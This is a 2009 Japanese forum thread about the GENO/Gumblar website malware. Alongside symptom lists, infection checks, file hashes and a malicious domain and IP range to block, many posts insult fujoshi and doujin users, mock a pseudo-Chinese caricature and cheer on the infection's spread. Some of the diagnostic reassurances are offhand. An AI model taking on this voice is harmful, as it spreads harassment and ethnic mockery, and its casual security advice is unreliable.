GENOウイルススレ　★8

・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/

前スレ
GENOウイルススレ　★7
http://pc11.2ch.net/test/read.cgi/sec/1242465121/

KINGは業界団体に入ってない単なるジョークソフト
http://internet.watch.impress.co.jp/cda/news/2008/02/05/18360.html

ALWIL Software
AV-Comparatives
AV-Test.org
AVG Technologies
Avira GmbH
Bit9
BitDefender
Doctor Web, Ltd.
ESET
F-Secure Corporation
G DATA Software
Hispasec Sistemas
International Business Machines Corporation
Kaspersky Lab
McAfee, Inc.
Microsoft Corp.
Norman ASA
Panda Security
PC Tools
Sana Security
Secure Computing
Sophos Plc
Symantec Corporation
Trend Micro Incorporated
Virusbuster Ltd.

また腐女子か。
キモイから規制しろ

関連スレ
【管理も】同人サイト・GENOウィルス注意3【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242466997/

GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/internet/1242450264/

409 名前：geno[sage] 投稿日：2009/05/16(土) 21:18:55 ID:UNJfTOVM0
セキュリティー板じゃ同人騒ぎすぎとか言ってるが、
サイト管理人にしてみたら自分が配布元になりかねないんだから
信用問題だと思った


・・・が言えなかった。

★過去スレ
GENOウイルススレ　★7
http://pc11.2ch.net/test/read.cgi/sec/1242465121/
GENOウイルススレ　★5（★6）
http://pc11.2ch.net/test/read.cgi/sec/1242415108/
GENOウイルススレ　★5
http://pc11.2ch.net/test/read.cgi/sec/1242415022/
GENOウイルススレ　★4
http://pc11.2ch.net/test/read.cgi/sec/1242363241/
GENOウイルススレ　★3
http://pc11.2ch.net/test/read.cgi/sec/1240853183/
GENOウイルススレ　★2
http://pc11.2ch.net/test/read.cgi/sec/1239364066/
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/sec/1239152979/

409 名前：geno[sage] 投稿日：2009/05/16(土) 21:18:55 ID:UNJfTOVM0
セキュリティー板じゃ同人騒ぎすぎとか言ってるが、
サイト管理人にしてみたら自分が配布元になりかねないんだから
信用問題だと思った


・・・が言えなかった。

結局次スレたったんだな

>>1乙

前スレ>>997
その両者だったらばかなやつの方がマシだろ

腐女子は巣に帰ってください。セキュ板からのお願いです

>>1乙
同人サイトの方はまずこちらを見て下さい
【管理も】同人サイト・GENOウィルス注意3【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242466997/

同人スレの方のまとめより、まとめ見ても全然分からないって人は
とりあえずこれだけはやっとけ、自分でサイト持ってない人はとりあえずは何もしなくてよし
＞最低限やるべきこと
＞あなたがサイト管理者である場合、自サイトのソースをチェックし
＞</head>と<body>の間に入れた覚えのないjavascriptのコードが入ってるか確認してください。
＞入っている場合はウィルスに感染しています。
＞感染を広げないため、一刻も早くサイトを削除してください。

>>●３６５日、毎日９：００〜２４：００まで対応！
（#｀ハ´）答えは全て「ｻｲｲﾝｽﾄｰﾙｽﾙ ｱﾙ」

>>●パソコン、メール、周辺機器などの面倒な設定、変更をサポート！
（#｀ハ´）VB不具合無いアル、不具合周辺機器せいアル。周辺機器メーカーへ問い合わせるアル

>>●パソコン、メール、インターネット関連のトラブルに対応！
（#｀ハ´）VB不具合無いアル、お使いのパソコンメーカー、プロバイダーに問い合わせるアル

>>●パソコン、アプリケーション、周辺機器など基本的な操作方法をサポート！
（#｀ハ´）VB不具合無いアルから、お使いのパソコンメーカーに問い合わせるアル

>>●ハードウェアの故障の場合は、トラブルを切り分けし、メーカサポートをご案内
（#｀ハ´）切り分ける能力無いアル。VB不具合全部ハードのせいアルネ

>>●電話でわからない場合は、リモート（遠隔操作）で対応も！！で解決！！
（#｀ハ´）msconfigでスタートアップ・サービス全止め→再起動、なおらなければｻｲｲﾝｽﾄｰﾙ ｱﾙ

感染予防対策

１．Adobe Flash Player の最新版にアップデート
２．Adobe Acrobat Reader の最新版にアップデート
３．NoScriptの導入（Firefoxの導入）
４．Adobe Acrobat Readerの JavaScript 機能OFF
５．危険IPのブロック


諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

１．Adobe Readerを起動し「編集」メニューの「環境設定」
　　「Acrobat JavaScriptを使用」のチェックボックスをオフ（チェックを外す）
　　OKを押して設定確定後、Adobe Readerを終了。
↓
２．必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
　　設定は SpeedUp - Fast がおすすめ。
　　　注意すべきは
　　　Acroform（拡張子なし）
　　　Annotations（拡張子なし）
　　　これら2つのチェックボックスをオン（チェックが入っている）状態にしておく必要がある。
　　　そうしないと Adobe Reader が起動しなかったりする。

　　　このとき追加作業として
　　　EScript.apiとEScript.JPNのチェックボックスをオフ（チェックを外す）状態にしておくと
　　　より安心かもしれない。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Readeｒ以外の環境設定をどうするかも各自考える必要があります。

雑談スレなんてイラネ

腐女子って本当ネチネチしてんだな
マジクズ

>>1乙

【感染の確認方法】
�@cmd.exe（コマンドプロント）、regedit.exe（レジストリエディタ）が起動するか確認する
　※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
　■確認方法
　１．スタートから「ファイル名を指定して実行」
　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　　「regedit.exe」と入力して「OK」ボタンを押す。
　　　※立ち上がったことを確認したら弄らず閉じること。
　３．同様に、「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　※立ち上がったことを確認したら�Aへ

�Asqlsodbc.chmのファイルサイズの確認を確認する
　■Windows XP:
　　改ざんされていなければ
　　C:\WINDOWS\system32\sqlsodbc.chm　50,727 bytes
　■Windows 2000:
　　そもそも存在しないはずなので、
　　C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
　■確認方法
　　１．スタートから「ファイル名を指定して実行」
　　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　→背景が黒いウィンドウが開いた場合３へ
　　　→起動しない場合：感染疑い濃厚
　　３．背景が黒いウィンドウを選択。
　　　小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

�Bavast!（無料のアンチウイルスソフト）で確認

>>9
しつもんする→わかんない
無限ループ

前スレが腐スレヲチで終わってるんだが

お前らほんとに腐女子好きなんだなw

　　　⊂二￣⌒＼　シェシェ〜
　　　　　　　　　　）＼　 　ヽ　　　　　　　　　ニーーハォ！！
　　　　　　　　　／＿＿　　　）　　 ∧∧　　　　　　　　ノ）
　　　　　　　　/／／／　 ／|.　 ／ 華 ＼ 　　　 　 ／　＼　　　ワタシ嘘大っ嫌いアルヨ！！　
　　　　　　　 / / / ／／＼　＼（　｀ハ´　）　　 _／ ／＾＼)
　　　　　　 / / / (／　　　ヽ、　 　 　 　 ⌒￣＿／
　　　　　　（ ( （／　　　　　　ﾉ　 Ｔ　Ｍ ／￣　　　　　みなさん今日は大変うれしいおしらせアルヨ〜！！
　　　　　　　　　　　　　　　 ./　　　 　／　　　　　　　　　　このチャンス逃したら一生後悔するアルネ！！
　　　　　　　　　　　　　　　　　　　　|＼　　　　　　　　　　　　　　　　　
　　　　　　　　　　　　　　／￣￣￣　　￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　　　　　　　　　|　なんと！あの！国民的大人気サクサク快適安心ソフト、ウイルスバスターが
　　　　　　　　　　　　　　|　只今、無料で2カ月延長利用できるキャンペーンアルヨ〜！！！
　　　　　　　　　　　　　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿

とりあえずGENOの思惑は腐女子によってかなえられそうだな

次スレイランのでは？

ドメインとIP変わったっぽいから弾いてる奴は注意な
martuz.cn
95.129.144.0/23 (95.129.144.0-95.129.145.255)

GENO亜種が猛威振るってるな
いいぞもっとやれ

正常なsqlsodbc.chm
ファイルサイズ：50,727バイト
CRC32：B61C7A80
MD5：F639AFDE02547603A3D3930EE4BF8C12
SHA-1：FBDD32ED13D27E4102621E1067FDF3634F33B2C3

>>20
セキュ板はツンデレが多いですから

前スレがスレッドランキングに載ったぞｗ
セキュ板だとAVGの日本語化以来かな

ゴキ腐リは嫌だ
可愛いおにゃのこがいいお

現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
　※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している（このため、セキュ各社の自動検出が難しくなっている）
感染しない環境には何も返さない（更に検証が難しい）
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
　※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

情報が欲しい奴は同人板に行ったほうが良い
機能してるのはあっちのスレだ

こんなレベルの奴らに何言っても無駄だろ
ゆとり並に理解力ない上に無駄に高いプライドとかもう勝手に死んでくれと言うほかない

1 名前：自治 ◆mXx5gfarvs [] 投稿日：2009/05/09(土) 22:58:13 ID:apD2m+Ke0
同人板の自治スレです。

前スレ
【議論中】自治スレ 21＠同人板
http://changi.2ch.net/test/read.cgi/doujin/1237720615/

【緊急！現在ウィルス爆撃被害中。怪しいファイルをダウンロードしない等の自衛に努めて下さい】

★ウイルス関係まとめサイト★
http://life.45.kg/sec/for_doujin.html
http://www9.atwiki.jp/doujin-m/
http://life.45.kg/sec/

【現状】
▲現在同人板を爆撃しているウィルス
・スレッド内のレスをランダムコピペ。直前の書き込みにレスをつけたり、
トリップをつけたりするものもあります。
・970を過ぎたスレを埋め立てるウイルスもいます
・ウイルスとの区別のために名前欄に「自治#自治」入力推奨

【感染すると？】
・ウイルス混入のファイル実行で感染 (スレ見ただけでは感染しないからおちけつ)
・ウィルス感染者は、同人板閲覧者や2ch閲覧者とは限りません
・専ブラによるあぼーん機能の使用推奨

・感染すると自分の知らない間に、爆撃対象のスレに連続コピペ投下
・爆撃を果たしたIDは管理側にIPを割り出され、BBQに焼かれて書き込めなくなります
※現在は共有IPでも焼かれているので、巻き込まれる・巻き込む可能性もあります

　　　　　　　　　　　　　　　　 _..　-――-　._
　　　　　　　　　　　　　　.／　 ,―――‐-　._` .
　　　　　　　　　　　　 ／）　 ./　 ／　　／　　｀`＼
　　　　　　　　　　　／／／）ィ7T.ﾌ厂￣｀ﾌｉ ‐-_　|〉.　＿人人人人人人人人人人人人人人＿
　　　　　　　　　 ／,.=ﾞ''"／ 　ﾌl/_×／/　|ﾊハl　.ﾄ、＞　ｷｬｯｼｭ削除すればいいんだよ！！＜
　　　／　　　　 i f　,.r='"-‐'つｲ._T_i`　 　.r≦lハ!|｀`　^^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^￣
　　/　　　　　 /　　　_,.-‐'~|　|'弋..!ﾉ 　 　 i'＋!ｌ　|
　　　　／　 　,i　　　,二ﾆ⊃l　|' ' '　 ,‐- ..__ﾞｰ' .!l .|
　　　/　 　　ﾉ　　　 i　lﾞフ..,!l .ﾄ､　　ｌ　　｀,! 　 .ハ.!
　　　　　　,ｲ｢ﾄ､　　,!　,!|.../_| |l: ＞ .ヽ.. ィ ＜l 　 l|
　　　　　/　iﾄヾヽ_/　ｨ"＼. | | ＼ ＼ｰ'/ ./ ,,;:`:;'ﾞ

>>27
マジ？　久しぶりだな

確かに同人板の方がウイルスの話してるなｗ

>>31
同意
もうなんか色々呆れた

　　　　　　 ＿＿＿
　　　　　／　　 　 　＼
　　　 ／　　　⌒ 　 ⌒＼
　　／ 　 　 ,（⌒）　（⌒）､＼
　　| 　 　 /// （__人__）/// | 　　日本製だってお
　　＼　 　　　 ｀ ヽ_ノ　　 ／
　　　　ヽ　　 　, ＿_ , イ
　 　 ／　　　　　　　|＿"＿＿__
　 　| 　　ｌ..　　　／l´産地偽装 `l
　 　ヽ 　丶-.,／ 　|___＿＿＿__._|
　　　/`ー､＿ﾉ　／バスター　／
　　　　　　　　　　　　...2009／

正常なsqlsodbc.chm
ファイルサイズ：50,727バイト
CRC32：B61C7A80
MD5：F639AFDE02547603A3D3930EE4BF8C12
SHA-1：FBDD32ED13D27E4102621E1067FDF3634F33B2C3


PC初心者なんでCRC32.MD5.SHA-1ってのがよく分からんのだが
サイズは丁度同じだった。


感染してないとみて大丈夫そうでしょうか？
お願いします。

>>27
起動酎スキャンのAVGか

男ツンデレなんていらねーよｗ
おまえら単に女の子との接し方しらないだけろ。
好きな子にイジワルする小学生から成長してないセキュ住民ワロス

>>23
おｋ

腐女子が勝手に押しかけてきて荒らしていったスレ
おまけに粘着腐女子は未だ健在

踏んでしまったらしくIEがネットに繋がらなくなった
今はサブ機で２ｃｈしてる、cmdとかregeditは使える。

Windows XP用ネットワーク診断ツールの結果

前回の診断実行時刻: 05/16/09 21:23:13 ネットワーク アダプタの診断
ネットワークの場所の検出

info ホーム インターネット接続を使用します
ネットワーク アダプタの識別

error エラー 0x80070424: 指定されたサービスはインストールされたサービスとして存在しません。

HTTP、HTTPS、FTP の診断
HTTP、HTTPS、FTP の接続

warn HTTP: エラー 12007 (www.microsoft.com に接続中): The server name or address could not be resolved
warn FTP (パッシブ): エラー 12007 (ftp.microsoft.com に接続中): The server name or address could not be resolved
warn FTP (アクティブ): エラー 12007 (ftp.microsoft.com に接続中): The server name or address could not be resolved
warn HTTP: エラー 12007 (www.hotmail.com に接続中): The server name or address could not be resolved
warn HTTPS: エラー 12007 (www.microsoft.com に接続中): The server name or address could not be resolved
warn HTTPS: エラー 12007 (www.passport.net に接続中): The server name or address could not be resolved
error HTTP 接続ができませんでした。
error HTTPS 接続ができませんでした。
error FTP 接続ができませんでした。

-----------同人関係の方は以下スレにてお願いします-------------

【管理も】同人サイト・GENOウィルス注意3【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242466997/

このまま一般サイトに感染すれば面白いんだけどな

>>43
今はこっちが勝手に観察して
ネタを張り付けてるやつがいるだけだろ

腐女子腐女子言うやつらは向こう行って構ってもらえよ

>>44
してますけど

>>47
メシウマ！

凄い進んでるが何か恐ろしい事でも起きたのか？

法人サイトが感染しまくりでカオスな状況を楽しみたかったのに
この騒ぎだと月曜までに認知度上がっちゃって、web管理者が対策しちゃいそうだな

>>37
とりあえずファイルサイズが一緒なら大丈夫だと思う

>>49
トレンドマイクロいよいよピンチ

別にホモサイトが絶滅しても一向にかまわんよ

むしろ壊滅すればいいと思うよ

30代40代のババアが「女の子」ｗｗｗ

>>40
間違ってるかもしらんから自分でチェックよろ
http://www3.atword.jp/gnome/

腐女子はキモイだけじゃなく存在自体が邪魔だからな

ノートン先生と一緒に寝るお

実際法人サイトはどの程度影響されてるんだ？

あぼんばっかり

バスターまた更新キタ
４GB

とりあえずAdobe Readerを削除すればいいんだな
ずっと使ってないしうp立てもしてないし消してもいいや

あらゆる板から嫌悪されているのが腐女子
今ようやく理由が分かった気がする

つーか普通は一般サイトにウイルス蔓延してもちゃんと対策するだろ
情弱ゆとり腐のサイトがことごとく壊滅するだけ

おい同人サイト怖くていけなくなったじゃねえか
オタク引退宣言だわ

>>49
ノートン先生が働いてくれない

>>37
MD5いっしょだから大丈夫だろ

あんだけ荒らしておいて謝罪なしとか腐女子マジキチ

あれ…朝見たとき5だったと思ったら
なんかあったの？

むしろ暴れてたのはν速民な気が

>>49
マカフィー2010発売延期

来なくて良い

>>68
ほとんどここの住民が勝手に騒いでただけじゃね

>>70
最初は腐板から勝手にリンクされて大量搬入された

>>69
腐と戯れるひととき

>>62
FlashPlayerも削除してくれ

>>66
いつも通りだけどな。
そういう意味では遅くても来週には落ち着く。
マイクロソフトのパッチも出るかもな。

>>49
ノートン先生が食中毒で運ばれた

読者のみなさんにねらーだってバレるの嫌なので
ウイルス注意喚起文はサイトに載せません＾＾

人の多いwiki系のとこはヤバイんじゃね？
リンクを感染サイトへの外部リンクに書き換えられまくったらアウト

>>73
いいからお前は巣に帰れよ
迷惑なんだ、マジで。

ノートン先生が１５歳の美少女で処女だと判明した>49

ねらーって事より腐女子って事の方がよほど恥ずかしいと思う

同人サイト以外にも同盟サイトなどにも感染してるみたいです
ただ同人板にスレ立ってるおかげで同人サイトが目立っているようす

>>78
先生に比べると対策済みのＶＢは優秀だね

ウイルスにねらーも何もないんだけど
さすがマジキチはレベルが違うな

vistaが最強であることが証明されたの？

>>83
確かにホモでハアハアしてるよりは
ネラーの方がまだマシだな

>>85
台湾人特有の釣りですか？

>>69
ホモ同人が見れなくなって発狂した腐女子が大量に釣れた

腐女子ってなんでくだらないプライド持ってるの？ゴキブリなの？

ウイルス対策ベンダーにとっても今回の件は頭が痛いんじゃないか
有料のノートンより個人使用に限り無償のavastが活躍してさ。
「なんだ無料のウイルス対策ソフトの方が優秀じゃね」という事に気が付いて。

>>87
operaもな

ああいう一部のキチ層がいるせいで同人の奴らが変な目で見られるんじゃないの
ちゃんと正してやれよ仲間だろ

そもそも、すでに同人サイトだけの問題ってわけでもないからなあ
MSも動いてくれなきゃ糞面倒な状況はかわらないし

>>87
亜種が沢山あるから安心できないぜ

>>73
気持ち悪いな巣に帰れよゴミが

>>94
関わりたくないしお断りします

Adblockで*.cnと*.krのコンテンツをブロックしてたから全く気づかなかったわ

AVG＞＜

久しぶりにウイルスでギャーぎゃー言ってるから
山田ウイルスみたいなすっげーのかと思ったら腐女子がｸﾞｪｸﾞｪ大げさに騒いでただけだったのねん

>>92
目立たないだけで結構あるし、もちろん逆も多い。
流石に今回のはでかいけど。

vistaを売りたいゲイツの罠なのか

>>93
狐は

>>92
4月下旬にもう感染サイト弾いてくれてたからねavastは

IPの遮断ってどないすんねん

同人と腐女子に過剰反応しすぎだろｗ

荒れた原因ですから＜腐女子

マジキチの話はもういいから

なんで、このスレ異常に速いの？

小林製薬でも感染してお詫びしてるくらいなのに…

この件、もの凄い事実に気づいてしまった・・・・
まさかとは思ったけど、なんかアレだな

>>106
もういいから来るなよ
ホモでハアハアしてな
ここを荒らすな

親父がよくニフあたりのFlashゲーやってるから不安だなぁ

GENOもまさか殺害予告出されるとは思わなかったろうな

カスペおじさんキレるよ？

まさか同人同人騒いで無かったことにしようとしてるんじゃ
ないよね
GENOさん

腐サイト全滅すれば良いのにな

GENO「や　ら　な　い　か？」

IPのブロックってどないすんねん

またいらんところで敵を作った腐女子であった

ＧＥＮＯウイルスなんてＶＢ入れてれば全然怖くないよ

お前ら言いすぎｗｗｗｗｗｗｗｗｗｗ
とも思ったが向こう見てると確かにひどいｗｗｗｗ
バカ多すぐるｗｗｗｗｗｗｗｗｗ
だから大流行してんだろうな、同人サイトでｗｗｗｗｗｗｗｗｗｗ

俺がGENOだあああああああ！！！！！

>>●３６５日、毎日９：００〜２４：００まで対応！
（#｀ハ´）答えは全て「ｻｲｲﾝｽﾄｰﾙｽﾙ ｱﾙ」

>>●パソコン、メール、周辺機器などの面倒な設定、変更をサポート！
（#｀ハ´）VB不具合無いアル、不具合周辺機器せいアル。周辺機器メーカーへ問い合わせるアル

>>●パソコン、メール、インターネット関連のトラブルに対応！
（#｀ハ´）VB不具合無いアル、お使いのパソコンメーカー、プロバイダーに問い合わせるアル

>>●パソコン、アプリケーション、周辺機器など基本的な操作方法をサポート！
（#｀ハ´）VB不具合無いアルから、お使いのパソコンメーカーに問い合わせるアル

>>●ハードウェアの故障の場合は、トラブルを切り分けし、メーカサポートをご案内
（#｀ハ´）切り分ける能力無いアル。VB不具合全部ハードのせいアルネ

>>●電話でわからない場合は、リモート（遠隔操作）で対応も！！で解決！！
（#｀ハ´）msconfigでスタートアップ・サービス全止め→再起動、なおらなければｻｲｲﾝｽﾄｰﾙ ｱﾙ

>>122
同人サイトがウイルスばらまいてるんだよな
あいつらがいなくなれば無くなりそうｗｗ

たった1日スレ見なかった間になんでこんなに伸びてるの？

Meの場合はどうやって感染確認するのでしょうか

>>125
とっととサイト消せばいい話なんだけどな

亜種っていっても基本的な感染経路や動作が同じなら対策は変わらないんで、
スレが脱線するのもやむをえない。

>>119
lt;丶｀∀´gt; PeerGuardian2 ★ 4 (｀ハ´ )
http://pc11.2ch.net/test/read.cgi/sec/1228949365/

>>118
adobeの穴を閉めとかないとな

>>126
腐女子に荒らされた

？
セキュリティスレに見せ掛けたオタ叩きスレ？

>>129
だよな。

>>126
トレンドマイクロいよいよピンチ

>>133
腐女子が散々荒らした残骸がこのスレです

>>133
違うよ
あいつらが今回のウイルスの原因だから

ゾイド板から

>>133
腐女子たたきスレですｗ
実質同人板の方が機能してる

このスレで今一番HOTな対策ソフトって何？

>>140
ノートン先生です

>>140
CAかな

>>140
ウイルスバスター

>>136
軌道修正しねえの？

>>109
IDが出ないから頭のアレな子達が大はしゃぎ

セキュ板総受けの同人誌出すわ

とりあえず余計なサイトみなきゃいいと思ってたけど
一般のサイトもやられてるわけで…

>>140
ノートン先生ですけど、現在休暇中です

ものすごい自演臭いスレですね。

>>147
つ携帯

>>147
同人の奴らが馬鹿なだけで
他のサイトは大丈夫でしょ

バカス臭いな

でかいサイトがやられたら日本沈没する

ＧＥＮＯウイルス×ノートン先生

>>132
なるほど、同人系のサイトが感染喰らって慌ててたってところか…
今更な気がするけど

>>135
バスターも何かやらかしたのか…

>>150
linux使えよ。
おまえら、linuxは腐女子の基本にしろ
そんくらい使いこなせないで、腐女子なのるな
風下だぜ

googleの検索結果をいじるって面白いな
他の検索エンジンの結果は通常なんだろうか

GENOのニュースとか日本国外の感染状況はどうなっている？

2chだけPCで見て、一般サイトは携帯で見てるわ

>>150
画面小さくてな…
まあ沈静化するまでは最低限そうするわ

>>140
Linux

>>153
いやM$が崩壊するだけさ。
linuxが世界を席巻する

早く対策されて普通に駆除できるようにならんものかなぁ

新たな「Webウイルス」が猛威、感染被害が急増：ITpro
http://itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/

同社が「JSRedir-R」と命名したもの。
実体はJavaScriptで書かれたプログラム（図1）。
多くの場合、攻撃者は何らかの方法で正規サイトに不正アクセスし、
このウイルスをWebページに埋め込む。
そのページにユーザーがアクセスすると、埋め込まれたウイルスが動き出し、
別のウイルスを勝手にインストールされる恐れなどがある。

これ、GENOウィルス?

もしもヤフーやグーグルがやられたらどうなってしまうだろうか

>>155
同人だけ異様に発見されてるww

ウィルスセキュリティは、大丈夫ですか？

>>164
それだ

>>165
googleは一時期感染報告あったが多分デマ

よくわかんないけどホモサイトにいかなきゃいいんだろ

avastがプッシュされてるのはほかのに比べてよく検知出来てるから？

>>165
グーグルでも感染例が報告済み

ノートン先生は対策してるのか？

>>169
googleの検索結果改竄とごっちゃになってただけだと思う。

>>169
多分検索先読みの話がごっちゃになってたんだろな

>>173
ノートンはおねんねタイムだよ

>>170　住人だけど、大丈夫だよ。

過去スレ読めよ

>>164
俺ら大勝利ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

>>173
俺の隣で寝てるから安心汁

>>171
貧乏人が多いスレだから

ニコニコの覗き見検索とやらは？

ノートン先生は月曜にならないと起きませんｗ

http://pc11.2ch.net/test/read.cgi/sec/1242125567/
答えは全てここにある！

>>170
公式サイトでも感染してるくらいのウィルスですよ。
同人サイトも見に行かないほうがいいですが、他にも気をつけましょう。

>>163
>>165
だから、Linux使ってれば関係ないってば。
他の惑星系のインフレくらい影響がない。

>>171
このウィルスに対して反応が早かった

>>170
ホモというかアニメとかオタク系は全滅みたいだよ

>>170
へたなんとかってのが公式感染しててやばいみたいよ
メシウマですけどね

>>173
一緒にお風呂に入ってるよ

macのbootcamp使いも危ねえのかなーこれは

狐かoperaでおｋ？

>>173
今アップ中
月曜日まで待ってろってばっちゃが言ってた

誰か教えてくだしあ…

ttp://shop.trendmicro.co.jp/vb_ms_sp2
ttp://shop.trendmicro.co.jp/store/trendjp/ja_JP/DisplayMSPage
これは？

>>194
ググれ

>>164
図1　「JSRedir-R」の一部（ソフォスの情報から引用）。
同ウイルスの実体は、JavaScriptで記述されたプログラム。
難読化された状態でWebページに埋め込まれる

http://itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/?SS=imgview&FD=-654642772&ST=securityhole

>>187
なるほどThx

ベホマ

ウィルスセキュリティZEROは？

>>188
そういうレベルの問題じゃないよ

>>199
キアリーだろ

>>200
さようなら

次スレたったのか

>>199
あえてぱふぱふ

>>200
先生以外のソフトならおｋ！

>>194
avast入れればおｋ
対応してるかは知らないけど

ヒットエンドラーン

>>201
いや、同人関係がほとんどなんだが

キアリクだろ

>>200
インドに帰れよ

>>200

何それ

同人同人いってるが
それ含めウェブサイトがやべーっていってんだろ

>>200
K7って書いてくれないと通じないんだけど？

>>209
別に同人関係だけで出回ってるウイルスじゃないから

こういう時いつも思うんだが先生っていつ仕事してんのかな

「ウイルス対策ソフトでるから余裕ｗ」と思ってそのまま放置とかありえそうで怖い

なんか同人関係を叩けば安心しちゃう変な子がいるな

>>197
http://itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/ph1.jpg
http://www.dotup.org/uploda/www.dotup.org34101.jpg

うお　これは感染してるページなん

>>164
やっと来たか…
しかしこれsophosが言ってるのを載せただけだし
日本国内のサイトがいかにやばい状態になってるかはこれじゃわからないだろうな

検体が欲しいのでだれか感染したサイトのURLｐｌｚ

>>216
俺らが寝てるときこっそり仕事してるよ

>>216
ノートン先生の本業はPCを重くすることだぞ

俺の他愛ない喧嘩してんの？っていう言葉で
両親が本当に険悪な雰囲気になってしまった
これもウィルスのせい？

ここに書かれてる対策して、あとは月曜まで携帯でネッサ
これでおｋ

K7は、大丈夫なんでしょうか？

検体スレいけ

ペストバトロールはどうですか？

先生ありがとう・・・　先生のことは忘れません・・・

>>226
インドへお帰りください

>>23
変わったって何で分かったの？

ノートン先生にはがんばってほしい

遊んでるバカが職場のPCでやらかしそうで怖い

>>224
主に祭り厨のせい
あいつらはとにかくスレで騒いでテンション上げることだけが目的でウイルスとかどうなってもいいんだろ

>>226
だから先生以外は大丈夫ってさっきから書いてるだろ

先生は、いつ仕事しているんですか？

へんなjavaスクが書いてあるページをjavaスクonにしてブラウザで表示させたらヤバいってことなら、
WWWCでアイコンを右クリック→ソースの表示
　（例えばです。他にも一杯やりかたあるんだろうけど。）
で、ソースに変なコードがあるかどうか見てみればいいんじゃないの？

>>164
同一なら、世界でも猛威を振るっていると言うことか・・・。

>>226
そんなフリーソフトはダメに決まってるだろボケ

>>237
そんな作業が普通にできる奴なら最初から問題ないんじゃね

感染してる奴って自分のサイトみて気付かないわけ？

ゼロとキングソフトは論外

同人サイトから責任を逸らそうとするのが多いなｗｗ
ここ最近発見されてるのは同人だけだが…？

>>237
その通り。それである程度防げる
で、お前はその作業をページが移るたびにやるつもりか？

>>241
うんこくさいのにうんこついてない
つまりそういうこと

カスペなら安心ですか？

パスMyPicturesまたはボリュームが無効です。

削除できない

>>241
同人スレ行ってみな何も分かってないよ

http://itpro.nikkeibp.co.jp/article/NEWS/20090514/330029/
慌てた同人のやつらとかひっかかりそうだな

スレ伸び加速しすぎw

ああ、同人サイトって同人誌無断でアップしてるサイトじゃなくて作ってる方の連中が引っ掛かってるのか
なんか思いっきり勘違いしてた

>>241
このウイルスは人を脅かすのが目的ではなく
こっそり各種情報を抜き取るのが目的なんで
感染しているかどうかはできるだけ見た目で判断できないように工夫している

騒ぎの初期には「cmd.exeが起動すれば安心！」みたいなお手軽判定法があったが、
とっくに対策された亜種が出回ってるようだ。

>>245
じゃあ感染者がソースみてもなんも書いてないけど周りはソース改竄されてるのは見えるわけ？

>>23
これほんとなの？
どこ情報？

先生はパルスアップデートで何をアップデートしてるんだよ・・・

>>243
なんでそんなに同人界隈と闘いたがるの？
ウイルス問題を摩り替えてない？

>>255
あんなの自己満に過ぎないさ

マジな話だけどＩＥ７，８の「InPrivate」使えば大丈夫じゃね？

>>255
ファイルの日付

>>244
うん。
いっつも行くサイトの更新チェックだけでもしたかったから。
でもよく考えたら、あらゆるページをそやって確認するのなんか、
確かにめんどくさ過ぎるわな。

>>258
おまえ感染してるよ
お疲れさん

>>258
大丈夫かどうか試してみ

検体スレってどこ？

WindowsUpdateが重いが
この件で殺到してるのだろうか

バタリアン並みの感染スピードｗ

腐とボカロと東方死亡∩(･ω･)∩ﾊﾞｼﾞｬｰｲ

>>259
ご丁寧に時間まで更新してるらしいな

>>266
害悪ジャンル壊滅かざまあ

>>264
ソンビ化したPCがDDoSやってるのかも

